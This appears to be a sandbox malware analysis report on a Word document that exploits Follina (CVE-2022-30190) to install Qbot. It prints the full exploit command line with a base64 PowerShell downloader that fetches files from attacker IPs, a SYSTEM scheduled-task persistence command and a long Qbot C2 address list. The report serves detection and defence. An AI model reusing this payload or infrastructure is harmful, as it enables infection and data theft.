Edit tour
Windows
Analysis Report
doc782.docx
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- WINWORD.EXE (PID: 2344 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Office16\ WINWORD.EX E" /Automa tion -Embe dding MD5: 0B9AB9B9C4DE429473D6450D4297A123) - MSOSYNC.EXE (PID: 4584 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - MSOSYNC.EXE (PID: 3108 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - msdt.exe (PID: 6524 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=? IT_ LaunchMeth od=Context Menu IT_Br owseForFil e=$(Invoke -Expressio n($(Invoke -Expressio n('[System .Text.Enco ding]'+[ch ar]58+[cha r]58+'Unic ode.GetStr ing([Syste m.Convert] '+[char]58 +[char]58+ 'FromBase6 4String('+ [char]34+' JABwACAAPQ AgACQARQBu AHYAOgB0AG UAbQBwADsA aQB3AHIAIA BoAHQAdABw ADoALwAvAD EAMAA0AC4A MwA2AC4AMg AyADkALgAx ADMAOQAvAC QAKAByAGEA bgBkAG8AbQ ApAC4AZABh AHQAIAAtAE 8AdQB0AEYA aQBsAGUAIA AkAHAAXAB0 AC4AQQA7AG kAdwByACAA aAB0AHQAcA A6AC8ALwA4 ADUALgAyAD MAOQAuADUA NQAuADIAMg A4AC8AJAAo AHIAYQBuAG QAbwBtACkA LgBkAGEAdA AgAC0ATwB1 AHQARgBpAG wAZQAgACQA cABcAHQAMQ AuAEEAOwBp AHcAcgAgAG gAdAB0AHAA OgAvAC8AMQ A4ADUALgAy ADMANAAuAD IANAA3AC4A MQAxADkALw AkACgAcgBh AG4AZABvAG 0AKQAuAGQA YQB0ACAALQ BPAHUAdABG AGkAbABlAC AAJABwAFwA dAAyAC4AQQ A7AHIAZQBn AHMAdgByAD MAMgAgACQA cABcAHQALg BBADsAcgBl AGcAcwB2AH IAMwAyACAA JABwAFwAdA AxAC4AQQA7 AHIAZQBnAH MAdgByADMA MgAgACQAcA BcAHQAMgAu AEEA'+[cha r]34+'))') )))i/../.. /../../../ ../../../. ./../../.. /../../Win dows/Syste m32/mpsigs tub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 6676 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \jsmb0bcn\ jsmb0bcn.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 1924 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S6719.tmp" "c:\Users \user\AppD ata\Local\ Temp\jsmb0 bcn\CSC77C 6618222CF4 6A59B8ECBD 8FB1D6F27. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 4500 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \hrcfnpcx\ hrcfnpcx.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 6404 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S7AFF.tmp" "c:\Users \user\AppD ata\Local\ Temp\hrcfn pcx\CSC217 99C95C9C74 436A487E34 3E485758E. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 2108 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t. A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 5316 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7) - schtasks.exe (PID: 408 cmdline:
"C:\Window s\system32 \schtasks. exe" /Crea te /RU "NT AUTHORITY \SYSTEM" / tn znkplrg o /tr "reg svr32.exe -s \"C:\Us ers\user\A ppData\Loc al\Temp\t. A\"" /SC O NCE /Z /ST 18:47 /ET 18:59 MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- regsvr32.exe (PID: 5968 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t1 .A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 6384 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- regsvr32.exe (PID: 2312 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t2 .A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 5836 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- csc.exe (PID: 5892 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \0x1gvsr0\ 0x1gvsr0.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 3232 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S51A8.tmp" "c:\Users \user\AppD ata\Local\ Temp\0x1gv sr0\CSCC2A C50C55CDA4 5EB81AFC36 471CF588E. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 4400 cmdline:
regsvr32.e xe -s "C:\ Users\user \AppData\L ocal\Temp\ t.A" MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 4420 cmdline:
-s "C:\Us ers\user\A ppData\Loc al\Temp\t. A" MD5: 426E7499F6A7346F0410DEAD0805586B)
- cleanup
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 22 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 31 entries |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Timestamp: | 185.234.247.119192.168.2.2280491732036726 06/07/22-18:38:14.250872 |
SID: | 2036726 |
Source Port: | 80 |
Destination Port: | 49173 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Malware Configuration Extractor: |